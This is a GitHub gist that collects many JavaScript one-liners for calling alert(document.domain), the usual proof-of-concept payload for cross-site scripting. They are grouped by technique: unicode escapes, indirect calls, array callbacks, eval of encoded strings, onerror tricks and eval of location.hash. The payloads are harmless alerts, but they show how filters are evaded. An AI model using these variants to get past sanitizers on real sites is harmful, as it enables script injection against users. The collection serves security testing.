- 
      
- 
        Save 100pingissues/f2a35632a08bc2318972518f206bf02e to your computer and use it in GitHub Desktop. 
    Ways to alert(document.domain)
  
        
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); | |
| top['alert'](document.domain); | |
| top[8680439..toString(30)](document.domain); | |
| top[/alert/.source](document.domain); | |
| alert(this['document']['domain']); | |
| // Indirect Invocation | |
| alert.call(null, document.domain); | |
| alert.apply(null, [document.domain]); | |
| alert.bind()(document.domain); | |
| Reflect.apply(alert, null, [document.domain]); | |
| alert.valueOf()(document.domain); | |
| with(document) alert(domain); | |
| Promise.all([document.domain]).then(alert); | |
| document.domain.replace(/.*/, alert); | |
| // Array methods | |
| [document.domain].find(alert); | |
| [document.domain].findIndex(alert); | |
| [document.domain].filter(alert); | |
| [document.domain].every(alert); | |
| [document.domain].forEach(alert); | |
| // Alternate array syntax (all array methods apply) | |
| Array(document.domain).find(alert); | |
| Array.of(document.domain).find(alert); | |
| (new Array(document.domain)).find(alert); | |
| // Other Datastructure Methods | |
| (new Map()).set(1, document.domain).forEach(alert); | |
| (new Set([document.domain])).forEach(alert); | |
| // Evaluated | |
| eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=')); | |
| eval(atob(/YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=/.source)); | |
| eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59)); | |
| setTimeout`alert\u0028document.domain\u0029`; | |
| Set.constructor`alert\x28document.domain\x29```; | |
| (new Function('alert(document.domain)'))(); | |
| (new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))(); | |
| Function('x','alert(x)')(document.domain); | |
| // Template Literal Expression | |
| `${alert(document.domain)}`; | |
| // onerror assignment | |
| onerror=alert;throw document.domain; | |
| onerror=eval;throw'=alert\x28document.domain\x29'; | |
| // With location.hash = #alert(document.domain) | |
| eval(location.hash.substr(1)) | 
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment